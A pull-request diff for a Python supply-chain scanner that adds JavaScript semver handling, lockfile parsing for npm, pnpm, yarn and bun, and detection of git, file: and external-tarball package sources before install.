### PR TITLE
feat(guard): add javascript supply-chain protection

### DIFF
--- a/src/codex_plugin_scanner/guard/runtime/js_semver.py
+++ b/src/codex_plugin_scanner/guard/runtime/js_semver.py
@@ -5,15 +5,32 @@ from __future__ import annotations
 import re
 from collections.abc import Sequence
 from dataclasses import dataclass
+from functools import total_ordering
 
-_JS_VERSION_RE = re.compile(r"^v?(?P<major>\d+)(?:\.(?P<minor>\d+))?(?:\.(?P<patch>\d+))?(?:[-+].*)?$")
+_JS_VERSION_RE = re.compile(
+    r"^v?(?P<major>\d+)(?:\.(?P<minor>\d+))?(?:\.(?P<patch>\d+))?"
+    r"(?:-(?P<prerelease>[0-9A-Za-z.-]+))?(?:\+[0-9A-Za-z.-]+)?$"
+)
 
 
-@dataclass(frozen=True, order=True, slots=True)
+@total_ordering
+@dataclass(frozen=True, slots=True)
 class JsSemverVersion:
     major: int
     minor: int
     patch: int
+    prerelease: tuple[str, ...] | None = None
+
+    def __lt__(self, other: object) -> bool:
+        if not isinstance(other, JsSemverVersion):
+            return NotImplemented
+        if (self.major, self.minor, self.patch) != (other.major, other.minor, other.patch):
+            return (self.major, self.minor, self.patch) < (other.major, other.minor, other.patch)
+        if self.prerelease is None:
+            return other.prerelease is not None
+        if other.prerelease is None:
+            return True
+        return _compare_prerelease(self.prerelease, other.prerelease) < 0
 
 
 def parse_js_semver(value: str | None) -> JsSemverVersion | None:
@@ -27,6 +44,7 @@ def parse_js_semver(value: str | None) -> JsSemverVersion | None:
         major=int(matched.group("major")),
         minor=int(matched.group("minor") or 0),
         patch=int(matched.group("patch") or 0),
+        prerelease=tuple(matched.group("prerelease").split(".")) if matched.group("prerelease") else None,
     )
 
 
@@ -111,3 +129,19 @@ def _matches_comparator(version: JsSemverVersion, operator: str, raw_value: str)
     if operator == "<":
         return version < parsed_value
     return version == parsed_value
+
+
+def _compare_prerelease(left: Sequence[str], right: Sequence[str]) -> int:
+    for left_token, right_token in zip(left, right, strict=False):
+        if left_token == right_token:
+            continue
+        left_numeric = left_token.isdigit()
+        right_numeric = right_token.isdigit()
+        if left_numeric and right_numeric:
+            return int(left_token) - int(right_token)
+        if left_numeric:
+            return -1
+        if right_numeric:
+            return 1
+        return -1 if left_token < right_token else 1
+    return len(left) - len(right)

--- a/src/codex_plugin_scanner/guard/runtime/js_semver.py
+++ b/src/codex_plugin_scanner/guard/runtime/js_semver.py
@@ -1,0 +1,113 @@
+"""Minimal JavaScript semver helpers for Guard runtime decisions."""
+
+from __future__ import annotations
+
+import re
+from collections.abc import Sequence
+from dataclasses import dataclass
+
+_JS_VERSION_RE = re.compile(r"^v?(?P<major>\d+)(?:\.(?P<minor>\d+))?(?:\.(?P<patch>\d+))?(?:[-+].*)?$")
+
+
+@dataclass(frozen=True, order=True, slots=True)
+class JsSemverVersion:
+    major: int
+    minor: int
+    patch: int
+
+
+def parse_js_semver(value: str | None) -> JsSemverVersion | None:
+    if not value:
+        return None
+    normalized = value.strip()
+    matched = _JS_VERSION_RE.match(normalized)
+    if matched is None:
+        return None
+    return JsSemverVersion(
+        major=int(matched.group("major")),
+        minor=int(matched.group("minor") or 0),
+        patch=int(matched.group("patch") or 0),
+    )
+
+
+def version_matches_js_selector(version: str, selector: str) -> bool:
+    parsed_version = parse_js_semver(version)
+    if parsed_version is None:
+        return False
+    normalized_selector = selector.strip()
+    if not normalized_selector or normalized_selector in {"*", "latest"}:
+        return True
+    return any(_matches_selector_clause(parsed_version, clause.strip()) for clause in normalized_selector.split("||"))
+
+
+def highest_js_version_for_selector(versions: Sequence[str], selector: str) -> str | None:
+    matching_versions: list[tuple[JsSemverVersion, str]] = []
+    for version in versions:
+        parsed_version = parse_js_semver(version)
+        if parsed_version is None or not version_matches_js_selector(version, selector):
+            continue
+        matching_versions.append((parsed_version, version))
+    if not matching_versions:
+        return None
+    matching_versions.sort()
+    return matching_versions[-1][1]
+
+
+def _matches_selector_clause(version: JsSemverVersion, clause: str) -> bool:
+    if not clause:
+        return False
+    tokens = clause.replace(",", " ").split()
+    if not tokens:
+        return False
+    if len(tokens) == 1 and not tokens[0].startswith(("^", "~", "<", ">", "=", "!")):
+        exact_version = parse_js_semver(tokens[0])
+        return exact_version == version if exact_version is not None else False
+    return all(_matches_selector_token(version, token) for token in tokens)
+
+
+def _matches_selector_token(version: JsSemverVersion, token: str) -> bool:
+    if token.startswith("^"):
+        return _matches_caret(version, token[1:])
+    if token.startswith("~"):
+        return _matches_tilde(version, token[1:])
+    for operator in (">=", "<=", ">", "<", "==", "="):
+        if token.startswith(operator):
+            return _matches_comparator(version, operator, token[len(operator) :])
+    exact_version = parse_js_semver(token)
+    return exact_version == version if exact_version is not None else False
+
+
+def _matches_caret(version: JsSemverVersion, lower_bound: str) -> bool:
+    parsed_lower = parse_js_semver(lower_bound)
+    if parsed_lower is None or version < parsed_lower:
+        return False
+    if parsed_lower.major > 0:
+        return version < JsSemverVersion(parsed_lower.major + 1, 0, 0)
+    if parsed_lower.minor > 0:
+        return version < JsSemverVersion(0, parsed_lower.minor + 1, 0)
+    return version < JsSemverVersion(0, 0, parsed_lower.patch + 1)
+
+
+def _matches_tilde(version: JsSemverVersion, lower_bound: str) -> bool:
+    parsed_lower = parse_js_semver(lower_bound)
+    if parsed_lower is None or version < parsed_lower:
+        return False
+    normalized_lower = lower_bound.strip()
+    if normalized_lower.count(".") == 0:
+        return version < JsSemverVersion(parsed_lower.major + 1, 0, 0)
+    return version < JsSemverVersion(parsed_lower.major, parsed_lower.minor + 1, 0)
+
+
+def _matches_comparator(version: JsSemverVersion, operator: str, raw_value: str) -> bool:
+    parsed_value = parse_js_semver(raw_value)
+    if parsed_value is None:
+        return False
+    if operator == ">=":
+        return version >= parsed_value
+    if operator == "<=":
+        return version <= parsed_value
+    if operator == ">":
+        return version > parsed_value
+    if operator == "<":
+        return version < parsed_value
+    return version == parsed_value

--- a/src/codex_plugin_scanner/guard/runtime/package_intent_common.py
+++ b/src/codex_plugin_scanner/guard/runtime/package_intent_common.py
@@ -17,7 +17,7 @@ IntentKind = Literal["install", "execute", "sync"]
 _EXTRAS_RE = re.compile(r"^(?P<name>[A-Za-z0-9_.-]+)\[(?P<extras>[A-Za-z0-9_,.-]+)\]$")
 _EGG_FRAGMENT_RE = re.compile(r"(?:^|[#&])egg=([^&#]+)")
 _PYTHON_VERSION_RE = re.compile(r"(?P<name>[^<>=!~\s]+)(?P<op>===|==|~=|!=|<=|>=|<|>|=)?(?P<version>.*)")
-_JS_SOURCE_PREFIXES = ("http://", "https://", "git+", "github:", "gitlab:", "bitbucket:")
+_JS_SOURCE_PREFIXES = ("http://", "https://", "git+", "github:", "gitlab:", "bitbucket:", "file:")
 
 
 @dataclass(frozen=True, slots=True)
@@ -369,7 +369,9 @@ def _looks_like_js_source_spec(value: str | None) -> bool:
 def _source_url_package_name(source_url: str) -> str | None:
     normalized = source_url.strip()
     candidate = (
-        normalized.partition(":")[2] if normalized.startswith(("github:", "gitlab:", "bitbucket:")) else normalized
+        normalized.partition(":")[2]
+        if normalized.startswith(("github:", "gitlab:", "bitbucket:", "file:"))
+        else normalized
     )
     sanitized = _sanitize_url(candidate)
     package_name = PurePath(sanitized).name

--- a/src/codex_plugin_scanner/guard/runtime/package_intent_common.py
+++ b/src/codex_plugin_scanner/guard/runtime/package_intent_common.py
@@ -17,6 +17,7 @@ IntentKind = Literal["install", "execute", "sync"]
 _EXTRAS_RE = re.compile(r"^(?P<name>[A-Za-z0-9_.-]+)\[(?P<extras>[A-Za-z0-9_,.-]+)\]$")
 _EGG_FRAGMENT_RE = re.compile(r"(?:^|[#&])egg=([^&#]+)")
 _PYTHON_VERSION_RE = re.compile(r"(?P<name>[^<>=!~\s]+)(?P<op>===|==|~=|!=|<=|>=|<|>|=)?(?P<version>.*)")
+_JS_SOURCE_PREFIXES = ("http://", "https://", "git+", "github:", "gitlab:", "bitbucket:")
 
 
 @dataclass(frozen=True, slots=True)
@@ -226,7 +227,21 @@ def js_target(spec: str) -> PackageIntentTarget:
     normalized_spec = spec
     if "@npm:" in spec and not spec.startswith("@npm:"):
         alias, _, normalized_spec = spec.partition("@npm:")
+    named_source_package, source_url = _split_js_named_source_spec(normalized_spec)
+    if source_url is not None:
+        return PackageIntentTarget("npm", named_source_package, spec, None, source_url=source_url, alias=alias)
+    if _looks_like_js_source_spec(normalized_spec):
+        return PackageIntentTarget(
+            "npm",
+            _source_url_package_name(normalized_spec),
+            spec,
+            None,
+            source_url=normalized_spec,
+            alias=alias,
+        )
     package_name, requested_specifier = _split_package_token(normalized_spec)
+    if _looks_like_js_source_spec(requested_specifier):
+        return PackageIntentTarget("npm", package_name, spec, None, source_url=requested_specifier, alias=alias)
     return PackageIntentTarget("npm", package_name, spec, requested_specifier, alias=alias)
 
 
@@ -326,3 +341,42 @@ def _sanitize_url(value: str) -> str:
         suffix = f"/{tail[0]}" if tail else ""
         return f"{scheme}://{authority}{suffix}".split("?", 1)[0].split("#", 1)[0]
     return value.split("?", 1)[0].split("#", 1)[0]
+
+
+def _split_js_named_source_spec(spec: str) -> tuple[str | None, str | None]:
+    if "@" not in spec:
+        return None, None
+    package_name, source_candidate = spec.rsplit("@", 1)
+    normalized_package_name = package_name.strip()
+    normalized_source = source_candidate.strip()
+    if not normalized_package_name or not _looks_like_js_source_spec(normalized_source):
+        return None, None
+    return normalized_package_name, normalized_source
+
+
+def _looks_like_js_source_spec(value: str | None) -> bool:
+    if not value:
+        return False
+    normalized = value.strip()
+    if normalized.startswith(_JS_SOURCE_PREFIXES) or "://" in normalized:
+        return True
+    if normalized.startswith("@") or normalized.startswith(("./", "../", "/")) or ":" in normalized:
+        return False
+    parts = normalized.split("/")
+    return len(parts) == 2 and all(part.strip() for part in parts)
+
+
+def _source_url_package_name(source_url: str) -> str | None:
+    normalized = source_url.strip()
+    candidate = (
+        normalized.partition(":")[2]
+        if normalized.startswith(("github:", "gitlab:", "bitbucket:"))
+        else normalized
+    )
+    sanitized = _sanitize_url(candidate)
+    package_name = PurePath(sanitized).name
+    if package_name.endswith(".tar.gz"):
+        return package_name[: -len(".tar.gz")] or normalized
+    if package_name.endswith((".git", ".tar", ".tgz")):
+        return package_name.rsplit(".", 1)[0] or normalized
+    return package_name or normalized

--- a/src/codex_plugin_scanner/guard/runtime/package_intent_common.py
+++ b/src/codex_plugin_scanner/guard/runtime/package_intent_common.py
@@ -369,9 +369,7 @@ def _looks_like_js_source_spec(value: str | None) -> bool:
 def _source_url_package_name(source_url: str) -> str | None:
     normalized = source_url.strip()
     candidate = (
-        normalized.partition(":")[2]
-        if normalized.startswith(("github:", "gitlab:", "bitbucket:"))
-        else normalized
+        normalized.partition(":")[2] if normalized.startswith(("github:", "gitlab:", "bitbucket:")) else normalized
     )
     sanitized = _sanitize_url(candidate)
     package_name = PurePath(sanitized).name

--- a/src/codex_plugin_scanner/guard/runtime/package_intent_parser.py
+++ b/src/codex_plugin_scanner/guard/runtime/package_intent_parser.py
@@ -96,6 +96,16 @@ def _parse_npm_intent(tokens: tuple[str, ...], *, workspace: Path | None) -> Pac
             manifest_candidates=("package.json",),
             lockfile_candidates=("package-lock.json",),
         )
+    if tokens[1] == "ci" or (len(tokens) >= 3 and tokens[1:3] == ("audit", "fix")):
+        return _build_intent(
+            "npm",
+            "sync",
+            tokens,
+            (),
+            workspace=workspace,
+            manifest_candidates=("package.json",),
+            lockfile_candidates=("package-lock.json",),
+        )
     if tokens[1] in {"exec", "x"}:
         return _parse_exec_intent(tokens, workspace=workspace)
     return None
@@ -488,6 +498,10 @@ def _exec_package_spec(tokens: tuple[str, ...]) -> str | None:
             positional_target = js_target(positional_package)
             explicit_target = js_target(explicit_package)
             if positional_target.package_name == explicit_target.package_name:
+                positional_specifier = positional_target.requested_specifier or positional_target.source_url
+                explicit_specifier = explicit_target.requested_specifier or explicit_target.source_url
+                if positional_specifier is None and explicit_specifier is not None:
+                    return explicit_package
                 return positional_package
             return explicit_package
         return explicit_package or positional_package

--- a/src/codex_plugin_scanner/guard/runtime/package_manifest_diff.py
+++ b/src/codex_plugin_scanner/guard/runtime/package_manifest_diff.py
@@ -219,7 +219,7 @@ def _yarn_selector_names(selector_line: str) -> tuple[str, ...]:
     names: list[str] = []
     for part in selector_line.split(","):
         selector = part.strip().strip('"').strip("'")
-        if not selector:
+        if not selector or selector == "__metadata":
             continue
         package_name = _yarn_selector_name(selector)
         if package_name and package_name not in names:

--- a/src/codex_plugin_scanner/guard/runtime/package_manifest_diff.py
+++ b/src/codex_plugin_scanner/guard/runtime/package_manifest_diff.py
@@ -22,6 +22,8 @@ from .package_intent_common import (
 _GRADLE_DEP_RE = re.compile(r"([A-Za-z0-9_.-]+):([A-Za-z0-9_.-]+):([A-Za-z0-9+_.-]+)")
 _GEMFILE_RE = re.compile(r"""gem\s+["']([^"']+)["'](?:\s*,\s*["']([^"']+)["'])?""")
 _GO_REQUIRE_RE = re.compile(r"^\s*([A-Za-z0-9./_-]+)\s+(v[^\s]+)\s*$")
+_YARN_CLASSIC_VERSION_RE = re.compile(r'^version\s+"([^"]+)"$')
+_YARN_BERRY_VERSION_RE = re.compile(r'^version:\s*"?([^"\s]+)"?$')
 
 
 class _DeadlineExceededError(RuntimeError):
@@ -66,6 +68,12 @@ def _dependency_map_for_path(path: str, text: str, *, deadline: float) -> dict[s
         )
     if lower_path.endswith("package-lock.json"):
         return _package_lock_dependency_map(text, deadline)
+    if lower_path.endswith("pnpm-lock.yaml"):
+        return _pnpm_lock_dependency_map(text, deadline)
+    if lower_path.endswith("yarn.lock"):
+        return _yarn_lock_dependency_map(text, deadline)
+    if lower_path.endswith("bun.lock"):
+        return _bun_lock_dependency_map(text, deadline)
     if lower_path.endswith("composer.json"):
         return _json_dependency_map(text, ("require", "require-dev"), deadline)
     if lower_path.endswith("requirements.txt"):
@@ -110,7 +118,162 @@ def _package_lock_dependency_map(text: str, deadline: float) -> dict[str, str]:
             version = value.get("version") if isinstance(value, dict) else None
             if isinstance(version, str):
                 dependencies[package_path.removeprefix("node_modules/")] = version
+    if dependencies:
+        return dependencies
+    legacy_dependencies = payload.get("dependencies")
+    if isinstance(legacy_dependencies, dict):
+        _walk_package_lock_v1_dependencies(legacy_dependencies, dependencies, deadline)
     return dependencies
+
+
+def _walk_package_lock_v1_dependencies(
+    payload: dict[str, object],
+    dependencies: dict[str, str],
+    deadline: float,
+) -> None:
+    for package_name, value in payload.items():
+        _ensure_within_deadline(deadline)
+        if not isinstance(package_name, str) or not isinstance(value, dict):
+            continue
+        version = value.get("version")
+        if isinstance(version, str):
+            dependencies[package_name] = version
+        nested_dependencies = value.get("dependencies")
+        if isinstance(nested_dependencies, dict):
+            _walk_package_lock_v1_dependencies(nested_dependencies, dependencies, deadline)
+
+
+def _pnpm_lock_dependency_map(text: str, deadline: float) -> dict[str, str]:
+    dependencies: dict[str, str] = {}
+    package_versions: dict[str, str] = {}
+    section: str | None = None
+    dependency_block = False
+    for raw_line in text.splitlines():
+        _ensure_within_deadline(deadline)
+        stripped = raw_line.strip()
+        if not stripped or stripped.startswith("#"):
+            continue
+        indent = len(raw_line) - len(raw_line.lstrip(" "))
+        if indent == 0:
+            section = stripped.removesuffix(":")
+            dependency_block = False
+            continue
+        if section not in {"packages", "snapshots"}:
+            continue
+        if indent == 2 and stripped.endswith(":"):
+            dependency_block = False
+            entry_name, entry_version = _pnpm_entry_name_version(stripped[:-1].strip().strip('"').strip("'"))
+            if entry_name is not None and entry_version is not None:
+                package_versions[entry_name] = entry_version
+                dependencies[entry_name] = entry_version
+            continue
+        if section == "snapshots" and indent == 4 and stripped == "dependencies:":
+            dependency_block = True
+            continue
+        if section == "snapshots" and indent <= 4:
+            dependency_block = False
+        if not dependency_block or indent < 6 or ":" not in stripped:
+            continue
+        dependency_name, _, dependency_value = stripped.partition(":")
+        normalized_name = dependency_name.strip().strip('"').strip("'")
+        normalized_value = dependency_value.strip().strip('"').strip("'")
+        exact_version = package_versions.get(normalized_name) or _exact_dependency_version(normalized_value)
+        if exact_version is not None:
+            dependencies[normalized_name] = exact_version
+    return dependencies
+
+
+def _pnpm_entry_name_version(entry: str) -> tuple[str | None, str | None]:
+    normalized_entry = entry.split("(", 1)[0].lstrip("/")
+    if "@" not in normalized_entry:
+        return None, None
+    package_name, _, package_version = normalized_entry.rpartition("@")
+    if not package_name or not package_version:
+        return None, None
+    return package_name, package_version
+
+
+def _yarn_lock_dependency_map(text: str, deadline: float) -> dict[str, str]:
+    dependencies: dict[str, str] = {}
+    current_names: tuple[str, ...] = ()
+    for raw_line in text.splitlines():
+        _ensure_within_deadline(deadline)
+        stripped = raw_line.strip()
+        if not stripped or stripped.startswith("#"):
+            continue
+        if not raw_line.startswith((" ", "\t")):
+            current_names = _yarn_selector_names(stripped.removesuffix(":"))
+            continue
+        if not current_names:
+            continue
+        version_match = _YARN_CLASSIC_VERSION_RE.match(stripped) or _YARN_BERRY_VERSION_RE.match(stripped)
+        if version_match is None:
+            continue
+        version = version_match.group(1)
+        for package_name in current_names:
+            dependencies[package_name] = version
+    return dependencies
+
+
+def _yarn_selector_names(selector_line: str) -> tuple[str, ...]:
+    names: list[str] = []
+    for part in selector_line.split(","):
+        selector = part.strip().strip('"').strip("'")
+        if not selector:
+            continue
+        package_name = _yarn_selector_name(selector)
+        if package_name and package_name not in names:
+            names.append(package_name)
+    return tuple(names)
+
+
+def _yarn_selector_name(selector: str) -> str | None:
+    if "@npm:" in selector and not selector.startswith("@npm:"):
+        return selector.partition("@npm:")[0] or None
+    if selector.startswith("@"):
+        package_name, _, _ = selector.rpartition("@")
+        return package_name or selector
+    package_name, _, _ = selector.partition("@")
+    return package_name or selector
+
+
+def _bun_lock_dependency_map(text: str, deadline: float) -> dict[str, str]:
+    _ensure_within_deadline(deadline)
+    payload = tomllib.loads(text or "")
+    packages = payload.get("package")
+    dependencies: dict[str, str] = {}
+    if not isinstance(packages, list):
+        return dependencies
+    for package in packages:
+        _ensure_within_deadline(deadline)
+        if not isinstance(package, dict):
+            continue
+        name = package.get("name")
+        version = package.get("version")
+        if isinstance(name, str) and isinstance(version, str):
+            dependencies[name] = version
+        nested_dependencies = package.get("dependencies")
+        if not isinstance(nested_dependencies, list):
+            continue
+        for dependency in nested_dependencies:
+            if not isinstance(dependency, dict):
+                continue
+            dependency_name = dependency.get("name")
+            exact_version = _exact_dependency_version(dependency.get("version"))
+            if isinstance(dependency_name, str) and exact_version is not None:
+                dependencies.setdefault(dependency_name, exact_version)
+    return dependencies
+
+
+def _exact_dependency_version(value: object) -> str | None:
+    if not isinstance(value, str):
+        return None
+    normalized = value.strip().strip('"').strip("'")
+    if not normalized:
+        return None
+    while normalized.startswith(("=", "^", "~", "v")):
+        normalized = normalized[1:]
+    return normalized or None
 
 
 def _requirements_dependency_map(text: str, deadline: float) -> dict[str, str]:

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_bundle_runtime.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_bundle_runtime.py
@@ -188,12 +188,12 @@ def verify_supply_chain_bundle_response(
 
 def _package_matches(package: SupplyChainBundlePackage, package_name: str, package_version: str | None) -> bool:
     normalized_name = package_name.strip().lower()
-    if package.name.lower() != normalized_name:
-        namespace_name = (
-            f"{package.namespace.lower()}/{package.name.lower()}" if package.namespace is not None else None
-        )
+    namespace_name = f"{package.namespace.lower()}/{package.name.lower()}" if package.namespace is not None else None
+    if normalized_name.startswith("@"):
         if namespace_name != normalized_name:
             return False
+    elif package.namespace is not None or package.name.lower() != normalized_name:
+        return False
     return package_version is None or package.version == package_version
 
 

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -364,8 +364,13 @@ def _finalize_evaluation(
     }[draft.decision]
     reason_message = _optional_string(draft.reasons[0].get("message")) if draft.reasons else None
     reason_code = _optional_string(draft.reasons[0].get("code")) if draft.reasons else None
-    if reason_code == "insecure_source_url" and reason_message is not None:
-        risk_summary = f"{prefix} `{package_ref}` from insecure HTTP source before install."
+    source_risk_summaries = {
+        "insecure_source_url": "from insecure HTTP source before install.",
+        "external_tarball_source": "from external tarball source before install.",
+        "git_dependency_source": "from git dependency source before install.",
+    }
+    if reason_code in source_risk_summaries and reason_message is not None:
+        risk_summary = f"{prefix} `{package_ref}` {source_risk_summaries[reason_code]}"
     fix_command = _fix_command(primary_package)
     title = {
         "block": "Critical install blocked",
@@ -1225,10 +1230,9 @@ def _dependency_confusion_policy_package_result(
     *,
     target: dict[str, object],
 ) -> dict[str, object] | None:
-    if (
-        (_optional_string(target.get("ecosystem")) or "npm") != "npm"
-        or _optional_string(target.get("namespace")) is not None
-    ):
+    if (_optional_string(target.get("ecosystem")) or "npm") != "npm" or _optional_string(
+        target.get("namespace")
+    ) is not None:
         return None
     current_time = datetime.now(timezone.utc).timestamp()
     target_name = str(target["name"]).lower()
@@ -1333,11 +1337,12 @@ def _is_git_source_url(source_url: str) -> bool:
 
 
 def _is_external_https_tarball_source(source_url: str) -> bool:
-    normalized = source_url.lower()
+    parsed = urllib.parse.urlsplit(source_url)
+    normalized_path = parsed.path.lower()
     return (
-        normalized.startswith("https://")
-        and normalized.endswith((".tgz", ".tar.gz", ".tar"))
-        and "registry.npmjs.org/" not in normalized
+        parsed.scheme.lower() == "https"
+        and normalized_path.endswith((".tgz", ".tar.gz", ".tar"))
+        and "registry.npmjs.org" not in parsed.netloc.lower()
     )
 
 
@@ -1728,7 +1733,7 @@ def _split_namespace_name(value: str) -> tuple[str | None, str]:
 def _exact_version(value: str | None) -> str | None:
     if value is None:
         return None
-    if "://" in value or value.startswith("git+"):
+    if "://" in value or value.startswith(("git+", "github:", "gitlab:", "bitbucket:")):
         return None
     if value.startswith(("^", "~", "<", ">", "!", "*")):
         return None

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -4,6 +4,7 @@ from __future__ import annotations
 
 import hashlib
 import json
+import re
 import time
 import urllib.error
 import urllib.parse
@@ -12,6 +13,11 @@ from dataclasses import dataclass, replace
 from datetime import datetime, timezone
 from pathlib import Path
 from xml.etree import ElementTree as ET
+
+try:
+    import tomllib  # type: ignore[attr-defined]
+except ModuleNotFoundError:
+    import tomli as tomllib  # type: ignore[no-redef]
 
 from packaging.specifiers import InvalidSpecifier, SpecifierSet
 from packaging.version import InvalidVersion, Version
@@ -1365,9 +1371,17 @@ def _lockfile_dependency_versions(
             lockfile_text = lockfile_path.read_text(encoding="utf-8")
         except (OSError, UnicodeDecodeError):
             continue
-        if lockfile_path.name != "package-lock.json":
+        if lockfile_path.name == "package-lock.json":
+            versions.update(_package_lock_target_versions(lockfile_text, targets))
             continue
-        versions.update(_package_lock_target_versions(lockfile_text, targets))
+        if lockfile_path.name == "pnpm-lock.yaml":
+            versions.update(_pnpm_lock_target_versions(lockfile_text, targets))
+            continue
+        if lockfile_path.name == "yarn.lock":
+            versions.update(_yarn_lock_target_versions(lockfile_text, targets))
+            continue
+        if lockfile_path.name == "bun.lock":
+            versions.update(_bun_lock_target_versions(lockfile_text, targets))
     return versions
 
 
@@ -1454,6 +1468,171 @@ def _package_lock_candidate_names(target: dict[str, object]) -> tuple[str, ...]:
     if qualified_name not in candidates:
         candidates.append(qualified_name)
     return tuple(candidates)
+
+
+def _pnpm_lock_target_versions(
+    text: str,
+    targets: tuple[dict[str, object], ...],
+) -> dict[tuple[str, str | None], str]:
+    direct_versions: dict[str, str] = {}
+    section: str | None = None
+    importer: str | None = None
+    dependency_block: str | None = None
+    dependency_name: str | None = None
+    for raw_line in text.splitlines():
+        stripped = raw_line.strip()
+        if not stripped or stripped.startswith("#"):
+            continue
+        indent = len(raw_line) - len(raw_line.lstrip(" "))
+        if indent == 0:
+            section = stripped.removesuffix(":")
+            importer = None
+            dependency_block = None
+            dependency_name = None
+            continue
+        if section != "importers":
+            continue
+        if indent == 2 and stripped.endswith(":"):
+            importer = stripped[:-1].strip('"').strip("'")
+            dependency_block = None
+            dependency_name = None
+            continue
+        if importer not in {".", "default"}:
+            continue
+        if indent == 4 and stripped.endswith(":"):
+            block_name = stripped.removesuffix(":")
+            dependency_block = block_name if "dependencies" in block_name.lower() else None
+            dependency_name = None
+            continue
+        if dependency_block is None:
+            continue
+        if indent == 6 and ":" in stripped:
+            raw_name, _, raw_value = stripped.partition(":")
+            dependency_name = raw_name.strip().strip('"').strip("'")
+            direct_value = raw_value.strip().strip('"').strip("'")
+            exact_version = _direct_lockfile_version(direct_value)
+            if exact_version is not None:
+                direct_versions[dependency_name] = exact_version
+                dependency_name = None
+            continue
+        if dependency_name is not None and indent >= 8 and stripped.startswith("version:"):
+            exact_version = _direct_lockfile_version(stripped.partition(":")[2].strip().strip('"').strip("'"))
+            if exact_version is not None:
+                direct_versions[dependency_name] = exact_version
+            dependency_name = None
+    return _target_versions_from_direct_map(targets, direct_versions)
+
+
+def _yarn_lock_target_versions(
+    text: str,
+    targets: tuple[dict[str, object], ...],
+) -> dict[tuple[str, str | None], str]:
+    versions: dict[tuple[str, str | None], str] = {}
+    current_selectors: tuple[str, ...] = ()
+    target_selectors = {_lockfile_target_key(target): set(_expected_yarn_selectors(target)) for target in targets}
+    for raw_line in text.splitlines():
+        stripped = raw_line.strip()
+        if not stripped or stripped.startswith("#"):
+            continue
+        if not raw_line.startswith((" ", "\t")):
+            current_selectors = tuple(
+                selector
+                for selector in (part.strip().strip('"').strip("'") for part in stripped.removesuffix(":").split(","))
+                if selector and selector != "__metadata"
+            )
+            continue
+        if not current_selectors:
+            continue
+        version_match = re.match(r'^version\s+"([^"]+)"$', stripped) or re.match(
+            r'^version:\s*"?([^"\s]+)"?$',
+            stripped,
+        )
+        if version_match is None:
+            continue
+        version = version_match.group(1)
+        selector_set = set(current_selectors)
+        for target_key, expected_selectors in target_selectors.items():
+            if target_key in versions or not expected_selectors:
+                continue
+            if selector_set & expected_selectors:
+                versions[target_key] = version
+    return versions
+
+
+def _expected_yarn_selectors(target: dict[str, object]) -> tuple[str, ...]:
+    requested = _optional_string(target.get("version")) or _optional_string(target.get("range"))
+    if requested is None:
+        return ()
+    normalized_name = str(target["normalized_name"])
+    alias = _optional_string(target.get("alias"))
+    selectors = [f"{normalized_name}@{requested}", f"{normalized_name}@npm:{requested}"]
+    if alias is not None:
+        selectors.append(f"{alias}@npm:{normalized_name}@{requested}")
+    return tuple(dict.fromkeys(selectors))
+
+
+def _bun_lock_target_versions(
+    text: str,
+    targets: tuple[dict[str, object], ...],
+) -> dict[tuple[str, str | None], str]:
+    try:
+        payload = tomllib.loads(text or "")
+    except tomllib.TOMLDecodeError:
+        return {}
+    packages = payload.get("package")
+    if not isinstance(packages, list):
+        return {}
+    versions_by_name: dict[str, list[str]] = {}
+    for entry in packages:
+        if not isinstance(entry, dict):
+            continue
+        name = _optional_string(entry.get("name"))
+        version = _optional_string(entry.get("version"))
+        if name is None or version is None:
+            continue
+        versions_by_name.setdefault(name, []).append(version)
+    versions: dict[tuple[str, str | None], str] = {}
+    for target in targets:
+        target_key = _lockfile_target_key(target)
+        requested = _optional_string(target.get("range"))
+        candidates = versions_by_name.get(str(target["normalized_name"]), [])
+        if len(candidates) == 1:
+            versions[target_key] = candidates[0]
+            continue
+        if requested is None:
+            continue
+        matching_versions = [value for value in candidates if version_matches_js_selector(value, requested)]
+        if len(matching_versions) == 1:
+            versions[target_key] = matching_versions[0]
+    return versions
+
+
+def _target_versions_from_direct_map(
+    targets: tuple[dict[str, object], ...],
+    direct_versions: dict[str, str],
+) -> dict[tuple[str, str | None], str]:
+    versions: dict[tuple[str, str | None], str] = {}
+    for target in targets:
+        target_key = _lockfile_target_key(target)
+        for candidate in _package_lock_candidate_names(target):
+            version = direct_versions.get(candidate)
+            if version is not None:
+                versions[target_key] = version
+                break
+    return versions
+
+
+def _direct_lockfile_version(value: str) -> str | None:
+    normalized = value.split("(", 1)[0].strip()
+    if normalized.startswith("npm:"):
+        normalized = normalized.partition("npm:")[2]
+    if "@" in normalized and not normalized.startswith("@"):
+        candidate = normalized.rsplit("@", 1)[-1]
+        if _exact_version(candidate) is not None:
+            return candidate
+    if _exact_version(normalized) is not None:
+        return normalized
+    return None
 
 
 def _lockfile_target_key(target: dict[str, object]) -> tuple[str, str | None]:
@@ -1731,15 +1910,16 @@ def _split_namespace_name(value: str) -> tuple[str | None, str]:
 
 
 def _exact_version(value: str | None) -> str | None:
-    if value is None:
+    normalized = _optional_string(value)
+    if normalized is None:
         return None
-    if "://" in value or value.startswith(("git+", "github:", "gitlab:", "bitbucket:")):
+    if "://" in normalized or normalized.startswith(("git+", "github:", "gitlab:", "bitbucket:")):
         return None
-    if value.startswith(("^", "~", "<", ">", "!", "*")):
+    if normalized.startswith(("^", "~", "<", ">", "!", "*")):
         return None
-    if any(token in value for token in ("||", " - ", ",")):
+    if any(token in normalized for token in ("||", " - ", ",")):
         return None
-    return value
+    return normalized
 
 
 def _optional_string(value: object) -> str | None:

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -1205,8 +1205,13 @@ def _local_package_manifest_path(target: dict[str, object], workspace_dir: Path 
     if workspace_dir is None:
         return None
     raw_spec = _optional_string(target.get("raw_spec"))
+    source_url = _optional_string(target.get("source_url"))
+    if source_url is not None and source_url.startswith("file:"):
+        raw_spec = source_url.partition("file:")[2]
     if raw_spec is None or raw_spec.startswith(("http://", "https://", "git+", "github:", "gitlab:", "bitbucket:")):
         return None
+    if raw_spec.startswith("file:"):
+        raw_spec = raw_spec.partition("file:")[2]
